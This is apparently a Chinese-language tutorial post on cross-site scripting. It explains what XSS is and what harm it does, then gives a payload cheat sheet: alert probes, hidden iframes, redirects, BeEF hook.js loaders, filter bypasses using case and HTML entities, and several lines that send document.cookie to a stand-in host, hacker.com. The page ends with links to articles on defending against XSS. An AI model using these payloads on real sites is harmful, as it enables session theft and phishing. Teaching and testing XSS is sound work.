2. 程式人生 > 實用技巧 >XSS攻擊

XSS攻擊

阿新 發佈:2020-08-11

介紹

  1. 跨站指令碼(cross site script)為了避免與樣式css混淆,所以簡稱為XSS。
  2. XSS是一種經常出現在web應用中的電腦保安漏洞,也是web中最主流的攻擊方式。那麼什麼是XSS呢?
  3. XSS是指惡意攻擊者利用網站沒有對使用者提交資料進行轉義處理或者過濾不足的缺點,進而新增一些程式碼,嵌入到web頁 面中去。使別的使用者訪問都會執行相應的嵌入程式碼。
  4. 從而盜取使用者資料、利用使用者身份進行某種動作或者對訪問者進行病毒侵害的一種攻擊方式。

XSS攻擊的危害包括:

1、盜取各類使用者帳號,如機器登入帳號、使用者網銀帳號、各類管理員帳號
2、控制企業資料,包括讀取、篡改、新增、刪除企業敏感資料的能力
3、盜竊企業重要的具有商業價值的資料
4、非法轉賬
5、強制傳送電子郵件
6、網站掛馬
7、控制受害者機器向其它網站發起攻擊

分類:

  • 反射型
  • 儲存型

構造XSS指令碼

常用html標籤

標籤 簡介
<iframe> iframe 元素會建立包含另外一個文件的內聯框架(即行內框架)。
<textarea> textarea 標籤定義多行的文字輸入控制元件。
<img> img 元素向網頁中嵌入一幅影象。
<script> script 標籤用於定義客戶端指令碼,比如 JavaScript。script 元素既可以包含指令碼語句,也可以通過 src 屬性指向外部指令碼檔案。必需的 type 屬性規定指令碼的 MIME 型別。JavaScript 的常見應用時影象操作、表單驗證以及動態內容更新。

常用JavaScript方法

方法 簡介
alert alert() 方法用於顯示帶有一條指定訊息和一個 確認 按鈕的警告框
window.location window.location 物件用於獲得當前頁面的地址 (URL),並把瀏覽器重定向到新的頁面。
location.href 返回當前顯示的文件的完整 URL
onload 一張頁面或一幅影象完成載入
onsubmit 確認按鈕被點選
onerror 在載入文件或影象時發生錯誤

構造XSS指令碼

彈窗警告

此指令碼實現彈框提示,一般作為漏洞測試或者演示使用,類似SQL注入漏洞測試中的單引號', 一旦此指令碼能執行,也就意 味著後端伺服器沒有對特殊字元做過濾<>/' 這樣就可以證明,這個頁面位置存在了XSS漏洞。

<script>alert('xss')</script>
<script>alert(document.cookie)</script>

頁面巢狀

<iframe src=http://www.baidu.com width=300 height=300></iframe>
<iframe src=http://www.baidu.com width=0 height=0 border=0></iframe>

頁面重定向

<script>window.location="http://www.qfedu.com"</script>
<script>location.href="http://www.baidu.com"</script>

彈框警告並重定向

這裡結合了一些社工的思路,例如,通過網站內部私信的方式將其發給其他使用者。如果其他使用者點選並且相信了這個信 息,則可能在另外的站點重新登入賬戶(克隆網站收集賬戶)

<script>alert("請移步到我們的新站");location.href="http://www.qfedu.com"</script>
<script>alert('xss');location.href="http://10.1.64.35/mutillidae/robots.txt"</script>

訪問惡意程式碼

<script src="http://www.qfedu.com/xss.js"></script>
<script src="http://BeEF_IP:3000/hook.js"></script> #結合BeEF收集使用者的cookie

巧用圖片標籤

<img src="#" onerror=alert('xss')>
<img src="javascript:alert('xss');">
<img src="http://BeEF_IP:3000/hook.js"></img>

繞開過濾的指令碼

大小寫

<ScrIpt>alert('xss')</SCRipt>

字元編碼 採用URL、Base64等編碼

<a
href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116
;&#40;&#34;&#120;&#115;&#115;&#34;&#41;">yangge</a>

收集使用者cookie

開啟新視窗並且採用本地cookie訪問目標網頁,開啟新視窗並且採用本地cookie訪問目標網頁。

<script>window.open("http://www.hacker.com/cookie.php?cookie="+document.cookie)</script>
<script>document.location="http://www.hacker.com/cookie.php?cookie="+document.cookie</script>
<script>new Image().src="http://www.hacker.com/cookie.php?cookie="+document.cookie;</script>
<img src="http://www.hacker.com/cookie.php?cookie='+document.cookie"></img>
<iframe src="http://www.hacker.com/cookie.php?cookie='+document.cookie"></iframe>
<script>new Image().src="http://www.hacker.com/cookie.php?cookie='+document.cookie";
img.width = 0;
img.height = 0;
</script>

攻擊導圖

相關推薦

說說如何防禦 DOM Based 型別的 XSS 攻擊

普通的 XSS,是通過服務端(比如模板技術)將資料輸出到 HTML 中。而 DOM Based 型別 的 XSS,是通過 JS 將資料輸出到 HTML 中。

Java防止xss攻擊附相關檔案下載

跨站指令碼(英語:Cross-site scripting,通常簡稱為:XSS)是一種網站應用程式的安全漏洞攻擊,是程式碼注入的一種。它允許惡意使用者將程式碼注入到網頁上,其他使用者在觀看網頁時就會受到影響。這類攻擊通常包含

springboot2.x使用Jsoup防XSS攻擊的實現

後端應用經常接收各種資訊引數,例如評論,回覆等文字內容。除了一些場景下面,可以特定接受的富文字標籤和屬性之外(如:b,ul,li,h1,h2,h3...),需要過濾掉危險的字元和標籤,防止xss攻擊

.net阻止XSS攻擊方法

public static string FilterXSS(this string html) { if (string.IsNullOrEmpty(html)) return string.Empty;

XSS攻擊過濾器

/// <summary> /// 防XSS攻擊 /// date:2020-07-28 /// </summary> public class XssFilter : ActionFilterAttribute

Spring Boot 利用Filter 實現防止XSS攻擊+設定Cookie HttpOnly

Spring Boot 利用Filter 實現防止XSS攻擊+設定Cookie HttpOnly 介紹 跨站指令碼攻擊XSS),是目前最普遍的Web應用安全漏洞。這類漏洞能夠使得攻擊者嵌入惡意指令碼程式碼到正常使用者會訪問到的頁面中,當正常使用

XSS攻擊

介紹 跨站指令碼(cross site script)為了避免與樣式css混淆,所以簡稱為XSSXSS是一種經常出現在web應用中的電腦保安漏洞,也是web中最主流的攻擊方式。那麼什麼是XSS呢?

Springboot框架新增防止XSS攻擊功能

一:什麼是XSS XSS攻擊全稱跨站指令碼攻擊,是一種在web應用中的電腦保安漏洞,它允許惡意web使用者將程式碼植入到提供給其它使用者使用的頁面中。

淺談XSS攻擊原理與解決方法

一、概述   XSS攻擊是Web攻擊中最常見的攻擊方法之一,它是通過對網頁注入可執行程式碼且成功地被瀏覽器 執行,達到攻擊的目的,形成了一次有效XSS攻擊。一旦攻擊成功,它可以獲取使用者的聯絡人列表,然後向聯絡

CSRF攻擊&XSS攻擊&SQL注入

概述 ​在 HTML 中,<a>, <form>, <img>, <script>, <iframe>, <link> 等標籤以及 Ajax 都可以指向一個資源地址,而所謂的跨域請求就是指:當前發起請求的域與該請求指向的資源

Django如何實現防止XSS攻擊

一、什麼是XSS攻擊 xss攻擊:----->web注入   xss跨站指令碼攻擊(Cross site script,簡稱xss)是一種“HTML注入”,由於攻擊的指令碼多數時候是跨域的,所以稱之為“跨域指令碼”。

springboot專案 防止xss攻擊

原文地址:https://www.cnblogs.com/gu-bin/p/12354913.html 一:什麼是XSS XSS攻擊全稱跨站指令碼攻擊,是一種在web應用中的電腦保安漏洞,它允許惡意web使用者將程式碼植入到提供給其它使用者使用的頁面中。

XSS攻擊概述

1.概念   跨站指令碼攻擊(Cross-Site Scripting,XSS)出現在上世紀 90年代中,由於跨站指令碼的縮寫和層疊樣式表(Cascading Style Sheets,CSS)的縮寫一樣,為了防止混淆,故縮寫成XSSXSS攻擊是由於Web應用程

xss攻擊 防治辦法

防止sql注入與xss攻擊 HTMLFilter package cn.galaiot.common.xss; import java.util.*; import java.util.concurrent.ConcurrentHashMap;

Spring Boot XSS 攻擊過濾外掛使用

XSS 是什麼 XSS(Cross Site Scripting)攻擊全稱跨站指令碼攻擊,為了不與 CSS(Cascading Style Sheets)名詞混淆,故將跨站指令碼攻擊簡稱為 XSSXSS 是一種常見 web 安全漏洞,它允許惡意程式碼植入到提供給其它使

dvwa上xss攻擊的一些等級邏輯跟攻擊思路

實戰 1 反射型XSS low <?php header (\"X-XSS-Protection: 0\"); // Is there any input? if( array_key_exists( \"name\", $_GET ) && $_GET[ \'name\' ] != NULL ) {

安全隨筆之xss攻擊

XSS攻擊 什麼是xss攻擊 XSS攻擊通常指的是通過利用網頁開發時留下的漏洞,通過巧妙的方法注入惡意指令程式碼到網頁,使使用者載入並執行攻擊者惡意製造的網頁程式。這些惡意網頁程式通常是JavaScript,但實際上也可

【專案】 Java 過濾器 解決儲存型xss攻擊問題

技術標籤:專案Javaxss攻擊JavafilterrequestinputStream XSS攻擊場景 攻擊者可以通過構造URL注入JavaScript、VBScript、ActiveX、HTML或者Flash的手段,利用跨站指令碼漏洞欺騙使用者,收集Cookie等相關資料並冒

php防範XSS攻擊

1、什麼是XSS攻擊 跨站指令碼攻擊(Cross Site Scripting),攻擊者往Web頁面裡插入惡意Script程式碼,當用戶瀏覽該頁之時,嵌入其中Web裡面的Script程式碼會被執行,從而達到惡意攻擊使用者的目的。

徹底理解XSS攻擊

一、簡述 跨站指令碼(Cross-site scripting,簡稱為:CSS, 但這會與層疊樣式表(Cascading Style Sheets,CSS)的縮寫混淆。因此,跨站指令碼攻擊縮寫為XSS)是一種網站應用程式的安全漏洞攻擊